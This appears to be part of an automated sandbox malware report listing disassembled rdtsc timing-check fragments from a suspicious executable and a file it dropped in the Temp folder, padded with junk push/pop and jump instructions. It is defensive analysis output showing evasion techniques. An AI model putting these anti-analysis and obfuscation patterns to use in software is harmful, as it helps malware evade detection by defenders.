Source: C:\Users\user\Desktop\L8ChrKrbqV.exe	RDTSC instruction interceptor: First address: 4FF0B2A second address: 4FF0BF1 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 jmp 00007FFAEC5291B7h 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d xchg eax, ebp 0x0000000e jmp 00007FFAEC5291B6h 0x00000013 mov ebp, esp 0x00000015 pushad 0x00000016 pushfd 0x00000017 jmp 00007FFAEC5291ADh 0x0000001c add esi, 37173516h 0x00000022 jmp 00007FFAEC5291B1h 0x00000027 popfd 0x00000028 popad 0x00000029 xchg eax, esi 0x0000002a jmp 00007FFAEC5291AEh 0x0000002f push eax 0x00000030 jmp 00007FFAEC5291ABh 0x00000035 xchg eax, esi 0x00000036 pushad 0x00000037 mov bl, al 0x00000039 pushfd 0x0000003a jmp 00007FFAEC5291B1h 0x0000003f xor eax, 7912E7D6h 0x00000045 jmp 00007FFAEC5291B1h 0x0000004a popfd 0x0000004b popad 0x0000004c mov esi, dword ptr [ebp+0Ch] 0x0000004f pushad 0x00000050 mov cx, 10E3h 0x00000054 mov dh, ch 0x00000056 popad 0x00000057 test esi, esi 0x00000059 push eax 0x0000005a push edx 0x0000005b jmp 00007FFAEC5291AEh 0x00000060 rdtsc
Source: C:\Users\user\Desktop\L8ChrKrbqV.exe	RDTSC instruction interceptor: First address: 4FF0BF1 second address: 4FF0C03 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FFAEC5267DEh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\L8ChrKrbqV.exe	RDTSC instruction interceptor: First address: 4FF0C03 second address: 4FF0C43 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 je 00007FFB5E5B6952h 0x0000000e jmp 00007FFAEC5291B7h 0x00000013 cmp dword ptr [770E459Ch], 05h 0x0000001a push eax 0x0000001b push edx 0x0000001c push eax 0x0000001d push edx 0x0000001e jmp 00007FFAEC5291B0h 0x00000023 rdtsc
Source: C:\Users\user\Desktop\L8ChrKrbqV.exe	RDTSC instruction interceptor: First address: 4FF0C43 second address: 4FF0C52 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FFAEC5267DBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\L8ChrKrbqV.exe	RDTSC instruction interceptor: First address: 4FF0C52 second address: 4FF0C58 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\L8ChrKrbqV.exe	RDTSC instruction interceptor: First address: 4FF0C58 second address: 4FF0CBE instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FFAEC5267DBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b je 00007FFB5E5CC004h 0x00000011 jmp 00007FFAEC5267E6h 0x00000016 xchg eax, esi 0x00000017 jmp 00007FFAEC5267E0h 0x0000001c push eax 0x0000001d push eax 0x0000001e push edx 0x0000001f pushad 0x00000020 pushfd 0x00000021 jmp 00007FFAEC5267DCh 0x00000026 xor cx, F9D8h 0x0000002b jmp 00007FFAEC5267DBh 0x00000030 popfd 0x00000031 mov ecx, 5F40788Fh 0x00000036 popad 0x00000037 rdtsc
Source: C:\Users\user\Desktop\L8ChrKrbqV.exe	RDTSC instruction interceptor: First address: 4FF0CBE second address: 4FF0D2E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov si, dx 0x00000006 pushfd 0x00000007 jmp 00007FFAEC5291B7h 0x0000000c and eax, 6645894Eh 0x00000012 jmp 00007FFAEC5291B9h 0x00000017 popfd 0x00000018 popad 0x00000019 pop edx 0x0000001a pop eax 0x0000001b xchg eax, esi 0x0000001c push eax 0x0000001d push edx 0x0000001e pushad 0x0000001f movsx ebx, si 0x00000022 pushfd 0x00000023 jmp 00007FFAEC5291B4h 0x00000028 or ecx, 05FAE8F8h 0x0000002e jmp 00007FFAEC5291ABh 0x00000033 popfd 0x00000034 popad 0x00000035 rdtsc
Source: C:\Users\user\AppData\Local\Temp\XAWR7RW45EPTK4VDBU7Q3V5ELG.exe	RDTSC instruction interceptor: First address: 6DFB01 second address: 6DFB07 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\XAWR7RW45EPTK4VDBU7Q3V5ELG.exe	RDTSC instruction interceptor: First address: 85311B second address: 85312D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 jp 00007FFAEC5291A6h 0x0000000c popad 0x0000000d pushad 0x0000000e push edi 0x0000000f pop edi 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\AppData\Local\Temp\XAWR7RW45EPTK4VDBU7Q3V5ELG.exe	RDTSC instruction interceptor: First address: 85312D second address: 853135 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\AppData\Local\Temp\XAWR7RW45EPTK4VDBU7Q3V5ELG.exe	RDTSC instruction interceptor: First address: 8480B5 second address: 8480D4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pushad 0x00000006 popad 0x00000007 pop esi 0x00000008 push eax 0x00000009 push edx 0x0000000a jmp 00007FFAEC5291B3h 0x0000000f push eax 0x00000010 pop eax 0x00000011 rdtsc
Source: C:\Users\user\AppData\Local\Temp\XAWR7RW45EPTK4VDBU7Q3V5ELG.exe	RDTSC instruction interceptor: First address: 8480D4 second address: 848117 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 pushad 0x0000000a je 00007FFAEC5267D6h 0x00000010 jmp 00007FFAEC5267E4h 0x00000015 push ebx 0x00000016 pop ebx 0x00000017 popad 0x00000018 jbe 00007FFAEC5267ECh 0x0000001e jmp 00007FFAEC5267E6h 0x00000023 rdtsc
Source: C:\Users\user\AppData\Local\Temp\XAWR7RW45EPTK4VDBU7Q3V5ELG.exe	RDTSC instruction interceptor: First address: 848117 second address: 848121 instructions: 0x00000000 rdtsc 0x00000002 js 00007FFAEC5291ACh 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\AppData\Local\Temp\XAWR7RW45EPTK4VDBU7Q3V5ELG.exe	RDTSC instruction interceptor: First address: 852258 second address: 85225C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\XAWR7RW45EPTK4VDBU7Q3V5ELG.exe	RDTSC instruction interceptor: First address: 85225C second address: 852262 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\XAWR7RW45EPTK4VDBU7Q3V5ELG.exe	RDTSC instruction interceptor: First address: 85252B second address: 85252F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\XAWR7RW45EPTK4VDBU7Q3V5ELG.exe	RDTSC instruction interceptor: First address: 85292E second address: 852942 instructions: 0x00000000 rdtsc 0x00000002 js 00007FFAEC5291ACh 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push ebx 0x0000000b push ebx 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\AppData\Local\Temp\XAWR7RW45EPTK4VDBU7Q3V5ELG.exe	RDTSC instruction interceptor: First address: 854A20 second address: 854A53 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 push ecx 0x00000004 pop ecx 0x00000005 pop ecx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 jno 00007FFAEC5267DEh 0x0000000f mov eax, dword ptr [esp+04h] 0x00000013 pushad 0x00000014 push esi 0x00000015 push esi 0x00000016 pop esi 0x00000017 pop esi 0x00000018 jmp 00007FFAEC5267DBh 0x0000001d popad 0x0000001e mov eax, dword ptr [eax] 0x00000020 push ecx 0x00000021 push eax 0x00000022 push edx 0x00000023 push eax 0x00000024 push edx 0x00000025 rdtsc
Source: C:\Users\user\AppData\Local\Temp\XAWR7RW45EPTK4VDBU7Q3V5ELG.exe	RDTSC instruction interceptor: First address: 854A53 second address: 854A57 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\XAWR7RW45EPTK4VDBU7Q3V5ELG.exe	RDTSC instruction interceptor: First address: 854B3D second address: 854B5F instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 jnl 00007FFAEC5267D6h 0x00000009 pop edx 0x0000000a pop edx 0x0000000b pop eax 0x0000000c mov eax, dword ptr [esp+04h] 0x00000010 push eax 0x00000011 push edx 0x00000012 pushad 0x00000013 pushad 0x00000014 popad 0x00000015 jmp 00007FFAEC5267DCh 0x0000001a popad 0x0000001b rdtsc
Source: C:\Users\user\AppData\Local\Temp\XAWR7RW45EPTK4VDBU7Q3V5ELG.exe	RDTSC instruction interceptor: First address: 854B5F second address: 854B82 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FFAEC5291B7h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov eax, dword ptr [eax] 0x0000000b push eax 0x0000000c push edx 0x0000000d push edx 0x0000000e pushad 0x0000000f popad 0x00000010 pop edx 0x00000011 rdtsc
Source: C:\Users\user\AppData\Local\Temp\XAWR7RW45EPTK4VDBU7Q3V5ELG.exe	RDTSC instruction interceptor: First address: 854B82 second address: 854BA6 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FFAEC5267E6h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esp+04h], eax 0x0000000d push eax 0x0000000e push edx 0x0000000f push eax 0x00000010 push edx 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\AppData\Local\Temp\XAWR7RW45EPTK4VDBU7Q3V5ELG.exe	RDTSC instruction interceptor: First address: 854BA6 second address: 854BAA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\XAWR7RW45EPTK4VDBU7Q3V5ELG.exe	RDTSC instruction interceptor: First address: 854BAA second address: 854BB4 instructions: 0x00000000 rdtsc 0x00000002 ja 00007FFAEC5267D6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\AppData\Local\Temp\XAWR7RW45EPTK4VDBU7Q3V5ELG.exe	RDTSC instruction interceptor: First address: 854BB4 second address: 854BBF instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jc 00007FFAEC5291A6h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\AppData\Local\Temp\XAWR7RW45EPTK4VDBU7Q3V5ELG.exe	RDTSC instruction interceptor: First address: 854BBF second address: 854C43 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 pop eax 0x00000008 mov dword ptr [ebp+122D33CAh], esi 0x0000000e push 00000003h 0x00000010 mov dword ptr [ebp+122D28C3h], eax 0x00000016 call 00007FFAEC5267E9h 0x0000001b mov edi, 0B172554h 0x00000020 pop esi 0x00000021 push 00000000h 0x00000023 mov edx, dword ptr [ebp+122D28CEh] 0x00000029 push 00000003h 0x0000002b sub dl, FFFFFFBFh 0x0000002e push D470ED7Fh 0x00000033 jns 00007FFAEC5267E0h 0x00000039 jmp 00007FFAEC5267DAh 0x0000003e xor dword ptr [esp], 1470ED7Fh 0x00000045 adc di, 2C60h 0x0000004a pushad 0x0000004b mov dword ptr [ebp+122D1832h], eax 0x00000051 or dword ptr [ebp+122D2DCCh], edi 0x00000057 popad 0x00000058 lea ebx, dword ptr [ebp+1244895Eh] 0x0000005e jng 00007FFAEC5267D7h 0x00000064 xchg eax, ebx 0x00000065 push ebx 0x00000066 push eax 0x00000067 push edx 0x00000068 pushad 0x00000069 popad 0x0000006a rdtsc
Source: C:\Users\user\AppData\Local\Temp\XAWR7RW45EPTK4VDBU7Q3V5ELG.exe	RDTSC instruction interceptor: First address: 854E31 second address: 854E4C instructions: 0x00000000 rdtsc 0x00000002 jo 00007FFAEC5291B1h 0x00000008 jmp 00007FFAEC5291ABh 0x0000000d pop edx 0x0000000e pop eax 0x0000000f mov eax, dword ptr [eax] 0x00000011 push ecx 0x00000012 pushad 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
Source: C:\Users\user\AppData\Local\Temp\XAWR7RW45EPTK4VDBU7Q3V5ELG.exe	RDTSC instruction interceptor: First address: 854F04 second address: 854F8D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FFAEC5267DAh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xor dword ptr [esp], 1F8647B3h 0x00000010 mov esi, dword ptr [ebp+122D36CAh] 0x00000016 mov esi, dword ptr [ebp+122D384Ah] 0x0000001c push 00000003h 0x0000001e jmp 00007FFAEC5267E1h 0x00000023 push 00000000h 0x00000025 or si, 235Dh 0x0000002a push 00000003h 0x0000002c mov edi, 08771C95h 0x00000031 or esi, dword ptr [ebp+122D2FE8h] 0x00000037 push DEC96D9Dh 0x0000003c jmp 00007FFAEC5267E9h 0x00000041 xor dword ptr [esp], 1EC96D9Dh 0x00000048 mov edx, dword ptr [ebp+122D1B6Fh] 0x0000004e lea ebx, dword ptr [ebp+12448972h] 0x00000054 sub dword ptr [ebp+122D3101h], eax 0x0000005a push eax 0x0000005b je 00007FFAEC5267DEh 0x00000061 push eax 0x00000062 push eax 0x00000063 push edx 0x00000064 rdtsc
Source: C:\Users\user\AppData\Local\Temp\XAWR7RW45EPTK4VDBU7Q3V5ELG.exe	RDTSC instruction interceptor: First address: 8671BA second address: 8671D3 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FFAEC5291B5h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\AppData\Local\Temp\XAWR7RW45EPTK4VDBU7Q3V5ELG.exe	RDTSC instruction interceptor: First address: 87662A second address: 876632 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\AppData\Local\Temp\XAWR7RW45EPTK4VDBU7Q3V5ELG.exe	RDTSC instruction interceptor: First address: 876632 second address: 876639 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 popad 0x00000007 rdtsc
Source: C:\Users\user\AppData\Local\Temp\XAWR7RW45EPTK4VDBU7Q3V5ELG.exe	RDTSC instruction interceptor: First address: 876639 second address: 87663F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\XAWR7RW45EPTK4VDBU7Q3V5ELG.exe	RDTSC instruction interceptor: First address: 87663F second address: 876649 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnp 00007FFAEC5291A6h 0x0000000a rdtsc
Source: C:\Users\user\AppData\Local\Temp\XAWR7RW45EPTK4VDBU7Q3V5ELG.exe	RDTSC instruction interceptor: First address: 876649 second address: 87664D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\XAWR7RW45EPTK4VDBU7Q3V5ELG.exe	RDTSC instruction interceptor: First address: 875334 second address: 875361 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FFAEC5291B9h 0x00000007 jnc 00007FFAEC5291ACh 0x0000000d pop edx 0x0000000e pop eax 0x0000000f pushad 0x00000010 push edx 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\AppData\Local\Temp\XAWR7RW45EPTK4VDBU7Q3V5ELG.exe	RDTSC instruction interceptor: First address: 875361 second address: 87536A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 push eax 0x00000006 push edx 0x00000007 pushad 0x00000008 popad 0x00000009 rdtsc
Source: C:\Users\user\AppData\Local\Temp\XAWR7RW45EPTK4VDBU7Q3V5ELG.exe	RDTSC instruction interceptor: First address: 87536A second address: 87536E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\XAWR7RW45EPTK4VDBU7Q3V5ELG.exe	RDTSC instruction interceptor: First address: 87551D second address: 875528 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jbe 00007FFAEC5267D6h 0x0000000a popad 0x0000000b rdtsc
Source: C:\Users\user\AppData\Local\Temp\XAWR7RW45EPTK4VDBU7Q3V5ELG.exe	RDTSC instruction interceptor: First address: 875528 second address: 875532 instructions: 0x00000000 rdtsc 0x00000002 jc 00007FFAEC5291C2h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\AppData\Local\Temp\XAWR7RW45EPTK4VDBU7Q3V5ELG.exe	RDTSC instruction interceptor: First address: 875532 second address: 87554F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FFAEC5267E6h 0x00000009 push edi 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\AppData\Local\Temp\XAWR7RW45EPTK4VDBU7Q3V5ELG.exe	RDTSC instruction interceptor: First address: 8756A7 second address: 8756AB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\XAWR7RW45EPTK4VDBU7Q3V5ELG.exe	RDTSC instruction interceptor: First address: 8756AB second address: 8756B1 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\XAWR7RW45EPTK4VDBU7Q3V5ELG.exe	RDTSC instruction interceptor: First address: 86A7DD second address: 86A7E1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\XAWR7RW45EPTK4VDBU7Q3V5ELG.exe	RDTSC instruction interceptor: First address: 86A7E1 second address: 86A800 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 jmp 00007FFAEC5267E7h 0x0000000d rdtsc
Source: C:\Users\user\AppData\Local\Temp\XAWR7RW45EPTK4VDBU7Q3V5ELG.exe	RDTSC instruction interceptor: First address: 86A800 second address: 86A808 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edx 0x00000005 pop edx 0x00000006 pushad 0x00000007 popad 0x00000008 rdtsc
Source: C:\Users\user\AppData\Local\Temp\XAWR7RW45EPTK4VDBU7Q3V5ELG.exe	RDTSC instruction interceptor: First address: 86A808 second address: 86A828 instructions: 0x00000000 rdtsc 0x00000002 jc 00007FFAEC5267D6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007FFAEC5267E4h 0x00000011 rdtsc
Source: C:\Users\user\AppData\Local\Temp\XAWR7RW45EPTK4VDBU7Q3V5ELG.exe	RDTSC instruction interceptor: First address: 87585A second address: 875873 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FFAEC5291B3h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\AppData\Local\Temp\XAWR7RW45EPTK4VDBU7Q3V5ELG.exe	RDTSC instruction interceptor: First address: 8760A2 second address: 8760A6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\XAWR7RW45EPTK4VDBU7Q3V5ELG.exe	RDTSC instruction interceptor: First address: 8760A6 second address: 8760B0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push ebx 0x00000009 pop ebx 0x0000000a rdtsc
Source: C:\Users\user\AppData\Local\Temp\XAWR7RW45EPTK4VDBU7Q3V5ELG.exe	RDTSC instruction interceptor: First address: 8760B0 second address: 8760B4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\XAWR7RW45EPTK4VDBU7Q3V5ELG.exe	RDTSC instruction interceptor: First address: 8760B4 second address: 8760C3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 jl 00007FFAEC5291A6h 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\AppData\Local\Temp\XAWR7RW45EPTK4VDBU7Q3V5ELG.exe	RDTSC instruction interceptor: First address: 876207 second address: 876211 instructions: 0x00000000 rdtsc 0x00000002 jo 00007FFAEC5267DCh 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\AppData\Local\Temp\XAWR7RW45EPTK4VDBU7Q3V5ELG.exe	RDTSC instruction interceptor: First address: 8764A4 second address: 8764AE instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\AppData\Local\Temp\XAWR7RW45EPTK4VDBU7Q3V5ELG.exe	RDTSC instruction interceptor: First address: 8764AE second address: 8764C2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FFAEC5267E0h 0x00000009 rdtsc
Source: C:\Users\user\AppData\Local\Temp\XAWR7RW45EPTK4VDBU7Q3V5ELG.exe	RDTSC instruction interceptor: First address: 8764C2 second address: 8764D3 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 jmp 00007FFAEC5291ABh 0x00000009 pop edx 0x0000000a pop eax 0x0000000b rdtsc
Source: C:\Users\user\AppData\Local\Temp\XAWR7RW45EPTK4VDBU7Q3V5ELG.exe	RDTSC instruction interceptor: First address: 87A62A second address: 87A630 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\XAWR7RW45EPTK4VDBU7Q3V5ELG.exe	RDTSC instruction interceptor: First address: 87A630 second address: 87A63A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jc 00007FFAEC5291A6h 0x0000000a rdtsc
Source: C:\Users\user\AppData\Local\Temp\XAWR7RW45EPTK4VDBU7Q3V5ELG.exe	RDTSC instruction interceptor: First address: 87CABF second address: 87CACE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jne 00007FFAEC5267D6h 0x0000000a popad 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\AppData\Local\Temp\XAWR7RW45EPTK4VDBU7Q3V5ELG.exe	RDTSC instruction interceptor: First address: 87CACE second address: 87CAD2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\XAWR7RW45EPTK4VDBU7Q3V5ELG.exe	RDTSC instruction interceptor: First address: 87BCDF second address: 87BCE5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\XAWR7RW45EPTK4VDBU7Q3V5ELG.exe	RDTSC instruction interceptor: First address: 87BCE5 second address: 87BCE9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\XAWR7RW45EPTK4VDBU7Q3V5ELG.exe	RDTSC instruction interceptor: First address: 87BCE9 second address: 87BD09 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007FFAEC5267E3h 0x00000012 rdtsc
Source: C:\Users\user\AppData\Local\Temp\XAWR7RW45EPTK4VDBU7Q3V5ELG.exe	RDTSC instruction interceptor: First address: 87BD09 second address: 87BD13 instructions: 0x00000000 rdtsc 0x00000002 jc 00007FFAEC5291A6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\AppData\Local\Temp\XAWR7RW45EPTK4VDBU7Q3V5ELG.exe	RDTSC instruction interceptor: First address: 87BD13 second address: 87BD19 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\XAWR7RW45EPTK4VDBU7Q3V5ELG.exe	RDTSC instruction interceptor: First address: 87BD19 second address: 87BD1D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\XAWR7RW45EPTK4VDBU7Q3V5ELG.exe	RDTSC instruction interceptor: First address: 87BD1D second address: 87BD21 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\XAWR7RW45EPTK4VDBU7Q3V5ELG.exe	RDTSC instruction interceptor: First address: 87CD9B second address: 87CD9F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\XAWR7RW45EPTK4VDBU7Q3V5ELG.exe	RDTSC instruction interceptor: First address: 87CD9F second address: 87CDA3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\XAWR7RW45EPTK4VDBU7Q3V5ELG.exe	RDTSC instruction interceptor: First address: 882A10 second address: 882A14 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\XAWR7RW45EPTK4VDBU7Q3V5ELG.exe	RDTSC instruction interceptor: First address: 882A14 second address: 882A18 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\XAWR7RW45EPTK4VDBU7Q3V5ELG.exe	RDTSC instruction interceptor: First address: 882A18 second address: 882A28 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 popad 0x0000000a je 00007FFAEC5291A6h 0x00000010 rdtsc
Source: C:\Users\user\AppData\Local\Temp\XAWR7RW45EPTK4VDBU7Q3V5ELG.exe	RDTSC instruction interceptor: First address: 882A28 second address: 882A2C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\XAWR7RW45EPTK4VDBU7Q3V5ELG.exe	RDTSC instruction interceptor: First address: 882F6B second address: 882F71 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\XAWR7RW45EPTK4VDBU7Q3V5ELG.exe	RDTSC instruction interceptor: First address: 882F71 second address: 882F85 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push esi 0x00000006 jmp 00007FFAEC5267DBh 0x0000000b push edi 0x0000000c pop edi 0x0000000d pop esi 0x0000000e rdtsc
Source: C:\Users\user\AppData\Local\Temp\XAWR7RW45EPTK4VDBU7Q3V5ELG.exe	RDTSC instruction interceptor: First address: 882F85 second address: 882F8F instructions: 0x00000000 rdtsc 0x00000002 jl 00007FFAEC5291AEh 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
